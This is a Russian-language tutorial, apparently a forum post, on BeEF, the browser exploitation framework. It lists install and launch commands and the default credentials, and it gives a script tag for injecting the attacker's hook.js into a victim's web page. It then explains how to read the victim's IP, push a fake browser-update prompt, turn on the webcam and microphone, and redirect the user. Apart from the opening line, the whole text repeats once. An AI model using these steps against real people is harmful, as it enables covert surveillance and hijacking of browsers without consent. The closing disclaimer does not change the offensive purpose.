BeFF пожалуй самая хорошая программа для проникновения на ПК через локальную сеть !Установка BeEF:
(в Kali Linux установка не требуется)
sudo apt-get install beef-xss
Запускать его тоже достаточно легко:
sudo beef-xss
Он покажет вам адрес, где находится hook.js и где находится интерфейс (по умолчанию localhost:3000/ui)
Переходим в web-интерфейс и вводим логин и пароль
По умолчанию: beef/beef
Далее вам надо внедрить в какую-либо страницу жертвы данный скрипт, который был указан при запуске:
<script src="[место, где находится hook.js]"></script>
А дальше уже можно тестировать, проникать и делать разные плюхи по отношению к жертве. К счастью или к сожалению, их слишком много, чтобы рассказать в одной статье, но можно и проникнуться по-подробней в некоторые. Вначале, когда мы хукнули жертву (можно и самого себя, на стартовой странице есть ссылка для этого) у нас слева появляется IP жертвы. Нажимаем на него. Далее у нас откроется окно, но нам надо выбрать во вкладках Commands.
* Если хотите узнать ip испытуемого, нам следует открыть папку host, а в ней выбрать Get Internal IP
Далее нажимаем запуск (справа внизу) и посередине у нас появляется пунктик, где написана дата и номер команды. Нажимаем и видим IP жертвы.
Так же можно в Социальной Инженерии использовать некоторые эксплоиты, такие как clippy (предлагает юзеру обновить браузер). Можно также подключиться к вебке или к микрофону и сделать запись, можно перенаправить юзера на другой URL.
Возможности beef-a просто зашкаливают
Конфигурационный файл в Kali располагается в
/etc/bin/beef-xss
Также можно подключить модули metasploit.
Советую ознакомиться с данным ресурсами именно в этом порядке:
1. http://kali.tools/?p=1535
2. http://hackware.ru/?p=784 (+подключение metasploit)
Дисклеймер:
Информация предоставлена исключительно для ознакомления. Не пытайтесь повторить действия писателей в реальной жизни, это грозит тюрьмой. Ответственность за возможно причинённый вред несёте только ВЫ.
(в Kali Linux установка не требуется)
sudo apt-get install beef-xss
Запускать его тоже достаточно легко:
sudo beef-xss
Он покажет вам адрес, где находится hook.js и где находится интерфейс (по умолчанию localhost:3000/ui)
Переходим в web-интерфейс и вводим логин и пароль
По умолчанию: beef/beef
Далее вам надо внедрить в какую-либо страницу жертвы данный скрипт, который был указан при запуске:
<script src="[место, где находится hook.js]"></script>
А дальше уже можно тестировать, проникать и делать разные плюхи по отношению к жертве. К счастью или к сожалению, их слишком много, чтобы рассказать в одной статье, но можно и проникнуться по-подробней в некоторые. Вначале, когда мы хукнули жертву (можно и самого себя, на стартовой странице есть ссылка для этого) у нас слева появляется IP жертвы. Нажимаем на него. Далее у нас откроется окно, но нам надо выбрать во вкладках Commands.
* Если хотите узнать ip испытуемого, нам следует открыть папку host, а в ней выбрать Get Internal IP
Далее нажимаем запуск (справа внизу) и посередине у нас появляется пунктик, где написана дата и номер команды. Нажимаем и видим IP жертвы.
Так же можно в Социальной Инженерии использовать некоторые эксплоиты, такие как clippy (предлагает юзеру обновить браузер). Можно также подключиться к вебке или к микрофону и сделать запись, можно перенаправить юзера на другой URL.
Возможности beef-a просто зашкаливают
Конфигурационный файл в Kali располагается в
/etc/bin/beef-xss
Также можно подключить модули metasploit.
Советую ознакомиться с данным ресурсами именно в этом порядке:
1. http://kali.tools/?p=1535
2. http://hackware.ru/?p=784 (+подключение metasploit)
Дисклеймер:
Информация предоставлена исключительно для ознакомления. Не пытайтесь повторить действия писателей в реальной жизни, это грозит тюрьмой. Ответственность за возможно причинённый вред несёте только ВЫ.